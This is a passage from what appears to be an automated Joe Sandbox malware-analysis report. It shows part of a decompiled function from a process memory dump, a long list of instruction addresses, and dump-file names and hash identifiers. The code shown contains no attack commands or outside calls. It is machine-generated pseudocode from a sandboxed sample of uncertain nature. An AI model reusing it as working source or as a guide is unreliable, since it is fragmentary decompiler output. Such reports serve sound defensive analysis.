                                                                                                                                                                            								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            								if(_t152 < 0) {
                                                                                                                                                                            									L25:
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                            									_t110 = E039A247B();
                                                                                                                                                                            									goto L26;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t152 = E0395A170(7, 0, 2, _t149, _t156 - 0x140);
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            									if(_t152 < 0) {
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									}
                                                                                                                                                                            									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
                                                                                                                                                                            										_t140 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                            										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
                                                                                                                                                                            										 *((short*)(_t156 - 0xda)) = _t118;
                                                                                                                                                                            										 *((short*)(_t156 - 0xdc)) = _t118;
                                                                                                                                                                            										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                            										if(E039604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                            											goto L25;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t152 = 0xc0150004;
                                                                                                                                                                            										L24:
                                                                                                                                                                            										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t152 = 0xc0150005;
                                                                                                                                                                            									goto L24;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L11;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
                                                                                                                                                                            				return _t152;
                                                                                                                                                                            			}















                                                                                                                                                                            0x03949046
                                                                                                                                                                            0x03949046
                                                                                                                                                                            0x0394904b
                                                                                                                                                                            0x03949050
                                                                                                                                                                            0x03949055
                                                                                                                                                                            0x0394905b
                                                                                                                                                                            0x0394905d
                                                                                                                                                                            0x03949066
                                                                                                                                                                            0x0394906f
                                                                                                                                                                            0x03949078
                                                                                                                                                                            0x03949080
                                                                                                                                                                            0x03949088
                                                                                                                                                                            0x0394908f
                                                                                                                                                                            0x03949095
                                                                                                                                                                            0x039490a9
                                                                                                                                                                            0x039490b1
                                                                                                                                                                            0x039490be
                                                                                                                                                                            0x039490c6
                                                                                                                                                                            0x039490cf
                                                                                                                                                                            0x039490e2
                                                                                                                                                                            0x039490f7
                                                                                                                                                                            0x039490fb
                                                                                                                                                                            0x03949118
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x03949123
                                                                                                                                                                            0x0394913b
                                                                                                                                                                            0x0394913f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x03949147
                                                                                                                                                                            0x039a231f
                                                                                                                                                                            0x039a231f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a231f
                                                                                                                                                                            0x03949154
                                                                                                                                                                            0x039a2330
                                                                                                                                                                            0x039a2336
                                                                                                                                                                            0x039a2336
                                                                                                                                                                            0x0394915a
                                                                                                                                                                            0x0394915a
                                                                                                                                                                            0x0394915a
                                                                                                                                                                            0x03949161
                                                                                                                                                                            0x03949167
                                                                                                                                                                            0x0394916b
                                                                                                                                                                            0x03949172
                                                                                                                                                                            0x03949182
                                                                                                                                                                            0x0394918e
                                                                                                                                                                            0x03949199
                                                                                                                                                                            0x039491ba
                                                                                                                                                                            0x039491be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039491e0
                                                                                                                                                                            0x039a2358
                                                                                                                                                                            0x039a2360
                                                                                                                                                                            0x039a2368
                                                                                                                                                                            0x039a236a
                                                                                                                                                                            0x039a2372
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a2378
                                                                                                                                                                            0x039a2378
                                                                                                                                                                            0x039a2381
                                                                                                                                                                            0x039a2458
                                                                                                                                                                            0x039a2458
                                                                                                                                                                            0x039a245b
                                                                                                                                                                            0x039a2463
                                                                                                                                                                            0x039a2468
                                                                                                                                                                            0x039a246e
                                                                                                                                                                            0x039a246e
                                                                                                                                                                            0x039a24a7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a24a7
                                                                                                                                                                            0x039a238f
                                                                                                                                                                            0x039a2396
                                                                                                                                                                            0x039a239c
                                                                                                                                                                            0x039a239f
                                                                                                                                                                            0x039a239f
                                                                                                                                                                            0x039a23bb
                                                                                                                                                                            0x039a23c8
                                                                                                                                                                            0x039a23ca
                                                                                                                                                                            0x039a23d2
                                                                                                                                                                            0x039a244c
                                                                                                                                                                            0x039a244c
                                                                                                                                                                            0x039a2453
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a23d4
                                                                                                                                                                            0x039a23e7
                                                                                                                                                                            0x039a23e9
                                                                                                                                                                            0x039a23f1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a23f9
                                                                                                                                                                            0x039a2402
                                                                                                                                                                            0x039a2408
                                                                                                                                                                            0x039a240c
                                                                                                                                                                            0x039a2413
                                                                                                                                                                            0x039a2423
                                                                                                                                                                            0x039a243f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a2441
                                                                                                                                                                            0x039a2446
                                                                                                                                                                            0x039a2446
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a2446
                                                                                                                                                                            0x039a23fb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a23fb
                                                                                                                                                                            0x039a23d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039a2372
                                                                                                                                                                            0x039491be
                                                                                                                                                                            0x03949118
                                                                                                                                                                            0x039490fd
                                                                                                                                                                            0x03949102
                                                                                                                                                                            0x0394910e

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $$@$@wvu
                                                                                                                                                                            • API String ID: 0-2337624265
                                                                                                                                                                            • Opcode ID: 18c370e31d009b94658c677b147deb13c8362ea7e945cc91a9a0a95d5cb28ecc
                                                                                                                                                                            • Instruction ID: 364e5a3ef7e3a0157d509f5e3787e55809f55341598b834959217f41a8f9837c
                                                                                                                                                                            • Opcode Fuzzy Hash: 18c370e31d009b94658c677b147deb13c8362ea7e945cc91a9a0a95d5cb28ecc
                                                                                                                                                                            • Instruction Fuzzy Hash: 56812971D002699BDB31DB54CC44BEEB7B8AF48750F0446EAE909B7290E7709E85CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%